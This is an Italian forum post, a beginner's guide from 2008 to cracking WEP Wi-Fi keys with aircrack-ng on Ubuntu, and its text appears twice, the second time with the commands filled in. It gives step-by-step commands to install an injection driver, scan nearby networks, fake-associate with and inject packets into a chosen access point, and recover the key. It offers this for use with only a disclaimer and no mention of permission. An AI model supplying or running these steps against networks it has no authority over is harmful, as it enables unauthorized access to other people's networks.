Salve, mi presento (dato che è il mio primo post e la mia prima guida).
Sono un ragazzo siciliano di 20 anni, che studia ingegneria informatica, con la passione per la programmazione e per i calcolatori. Amante della vita comoda e quindi di tutto ciò che è in grado di semplificare la vita
ho scritto questa guida (molto semplice, per un utente medio), qualche mese fa, e vorrei condividere qualcosa che non riuscivo a trovare quando interessava a me... spero sia di vostra utilità.
#PREPARARE IL TUTTO PER BENE
#[06-11-2008 23:03]
0) pre-pre-requisiti
conoscenza sistema linux
utilizzo bash
compilazione programmi
capacitàdi scrivere su una tastiera
utilizzo del mouse/touchpad
- Software utilizzato
Ubuntu 8.04 con kernel 2.6.24-21
aicrack-ng 1.0
driver ipwraw
- Hardware
Portatile acer 5920g con scheda intel 3945abg
un cervello
lattina di pepsi al limone
1) pre-requisiti
installare dai repositories i seguenti pacchetti:
build-essential
libssl-dev
scaricare i driver ipwraw da http://dl.aircrack-ng.org/drivers/
percorso completo http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
estrarre i file
entrare nella cartella e digitare dalla shell
aggiungere il modulo ipwraw alla blacklist di avvio (per evitare che vengano caricati all'avvio al posto del modulo iwl3945).
2) installare aircrack
- dai repositories
- scaricando i sorgenti, compilandoli ed installandoli
# EOF
[...fine primo tempo...]
[...secondo tempo...]
#CRACKING WEP KEY
#[06-11-2008 23:15]
0) caricamento moduli
{----attenzione----}
prima di usare aircrack
-disabilita driver iwl3945
-carica ipwraw
-potenziamento del segnale
--------------------
per connettersi normalmente
-disabilita driver ipwraw
-carica iwl3945
{-------fine-------}
1) vediamo che c'è in giro
appuntarsi su un file di testo:
A) nome rete
B) mac access point
C) mac client connesso
D) canale
[img=390x233]http://img522.imageshack.us/img522/8875/schermatave5.png[/img]
2) inizia lo sniffing
3) fake association
ovviamente senza le virgolette.
per sapere il nostro mac basta fare:
se tutto va bene vi dovràspuntare una bella faccina del genere
4) injection
5) cracking
aspettare circa 30 minuti, a volte anche meno, per poter raccogliere almeno 100000 IVS
dopo di che lanciare:
aspettare un po' ed ECCOCI LA CHIAVE WEP
# EOF
[by narcycs, informazioni prese su internet da molti siti web, non mi assumo alcuna responsabilitàper l'utilizzo di questo post]
alla prossima, saluti
Sono un ragazzo siciliano di 20 anni, che studia ingegneria informatica, con la passione per la programmazione e per i calcolatori. Amante della vita comoda e quindi di tutto ciò che è in grado di semplificare la vita
ho scritto questa guida (molto semplice, per un utente medio), qualche mese fa, e vorrei condividere qualcosa che non riuscivo a trovare quando interessava a me... spero sia di vostra utilità.
#PREPARARE IL TUTTO PER BENE
#[06-11-2008 23:03]
0) pre-pre-requisiti
conoscenza sistema linux
utilizzo bash
compilazione programmi
capacitàdi scrivere su una tastiera
utilizzo del mouse/touchpad
- Software utilizzato
Ubuntu 8.04 con kernel 2.6.24-21
aicrack-ng 1.0
driver ipwraw
- Hardware
Portatile acer 5920g con scheda intel 3945abg
un cervello
lattina di pepsi al limone
1) pre-requisiti
installare dai repositories i seguenti pacchetti:
build-essential
libssl-dev
Codice:
sudo apt-get install build-essential libssl-dev
scaricare i driver ipwraw da http://dl.aircrack-ng.org/drivers/
percorso completo http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
estrarre i file
Codice:
tar -xvjf ipwraw-ng-2.3.4-04022008.tar.bz2
entrare nella cartella e digitare dalla shell
Codice:
sudo make
sudo make install
sudo make install_ucode
aggiungere il modulo ipwraw alla blacklist di avvio (per evitare che vengano caricati all'avvio al posto del modulo iwl3945).
Codice:
sudo echo 'blacklist ipwraw' >> /etc/modprobe.d/blacklist
2) installare aircrack
- dai repositories
- scaricando i sorgenti, compilandoli ed installandoli
# EOF
[...fine primo tempo...]
[...secondo tempo...]
#CRACKING WEP KEY
#[06-11-2008 23:15]
0) caricamento moduli
{----attenzione----}
prima di usare aircrack
-disabilita driver iwl3945
Codice:
sudo modprobe -r iwl3945
-carica ipwraw
Codice:
sudo modprobe ipwraw
-potenziamento del segnale
Codice:
sudo iwconfig wifi0 rate 1M
--------------------
per connettersi normalmente
-disabilita driver ipwraw
Codice:
sudo modprobe -r ipwraw
-carica iwl3945
Codice:
sudo modprobe iwl3945
1) vediamo che c'è in giro
Codice:
sudo airodump-ng wifi0
appuntarsi su un file di testo:
A) nome rete
B) mac access point
C) mac client connesso
D) canale
[img=390x233]http://img522.imageshack.us/img522/8875/schermatave5.png[/img]
2) inizia lo sniffing
Codice:
airodump-ng -c "canale" -b "mac access point" -w file.cap wifi0
3) fake association
Codice:
aireplay-ng -1 0 -e "nome rete" -a "mac access point" -h "mac della nostra scheda" wifi0
ovviamente senza le virgolette.
per sapere il nostro mac basta fare:
Codice:
ifconfig | grep HWaddr
se tutto va bene vi dovràspuntare una bella faccina del genere
4) injection
Codice:
aireplay-ng -3 -b "mac access point" -h "mac client connesso" wifi0
5) cracking
aspettare circa 30 minuti, a volte anche meno, per poter raccogliere almeno 100000 IVS
dopo di che lanciare:
Codice:
$ sudo aircrack-ng file.cap
aspettare un po' ed ECCOCI LA CHIAVE WEP
# EOF
[by narcycs, informazioni prese su internet da molti siti web, non mi assumo alcuna responsabilitàper l'utilizzo di questo post]
alla prossima, saluti